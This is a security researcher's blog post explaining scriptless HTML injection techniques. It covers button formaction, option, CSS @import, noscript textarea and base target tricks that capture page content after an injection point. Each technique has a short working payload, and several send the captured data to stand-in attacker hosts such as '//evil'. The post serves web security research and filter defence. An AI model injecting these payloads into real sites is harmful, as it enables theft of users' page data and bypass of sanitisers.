The Spanner logo

    HTML scriptless attacks

    Back to articles

    hackvertor

    Author:

    Gareth Heyes

    @hackvertor

    Published: Wed, 21 Dec 2011 16:48:23 GMT

    Updated: Mon, 24 Mar 2025 20:23:13 GMT

    Following up on @lcamtuf's post about a "post xss" world. I thought I'd chip in with some vectors he missed. The textarea consumption technique he mentioned isn't new and wasn't invented by "Eric Y. Chen, Sergey Gorbaty, Astha Singhal, and Colin Jackson." it was openly discussed on sla.ckers for many years (as usual) but anyway lets discuss vectors.

    Button as a scriptless vector

    Using button is interesting because of two interesting specification changes in HTML5, one is the fact that the default type for a button is a submit and secondly the formaction attribute allows you to change it's parent form action. In addition button consumes HTML, allowing you store any html after button until the next or non existent closing button tag. Example vector:

    
<button name=xss type=submit formaction=//evil>I get consumed!

    Option as a scriptless vector

    A strange fact is option also consumes HTML, pretty obvious when you think about it but could lead to info disclosure like the button example.

    
<form action=//evil><select name=xss><option><b>steal me!</b>

    @import as a scriptless vector

    The CSS specification states that @import should continue parsing a url until it encounters a ending ";". This means you can use it to consume HTML. A vector like the following can steal data:

    
<style>@import//hackvertor.co.uk?
<b>steal me!</b>;

    Noscript scriptless vector

    Another interesting way to defeat XSS filters is to use the noscript tag as demonstrated by my attack against Caja's HTML filter.

    
<noscript><form action=http://google.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=pwnd><textarea name=contents></noscript>

    It uses the noscript tag to generate a textarea that when enabled (because of no javascript present) consumes the HTML after. This can also be initiated using security=restricted on IE or the new HTML5 iframe sandbox option. Original report.

    Using window.name via base target

    You can also use the target attribute to assign the contents of the HTML after to the window name and then later retrieve it x-domain after a user clicks an external link.

    
<base target='
steal me'<b>test</b>

    So here we inject a base tag with a target attribute, the target then assigns everything after ' to the window.name and then can be retrieved when the user clicks to the external server.

    That's all folks.

    Back to articles